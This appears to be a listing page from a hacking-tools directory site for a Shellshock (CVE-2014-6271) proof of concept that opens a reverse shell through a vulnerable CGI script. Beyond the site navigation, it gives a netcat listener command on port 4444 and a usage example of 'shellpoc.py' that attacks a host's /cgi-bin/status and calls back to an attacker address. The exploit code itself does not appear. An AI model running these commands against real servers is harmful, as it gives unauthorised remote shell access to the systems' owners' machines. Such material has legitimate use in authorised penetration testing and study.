Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!
Shellshock POC | CVE-2014-6271 | cgi-bin reverse shell
Discover the most used tools by our community.
Explore all tools
Browse our collection of tools
nc -l -p 4444
python shellpoc.py <host> <vulnerable CGI> <attackhost/IP>
python shellpoc.py 10.10.10.101 /cgi-bin/status 10.10.10.1/4444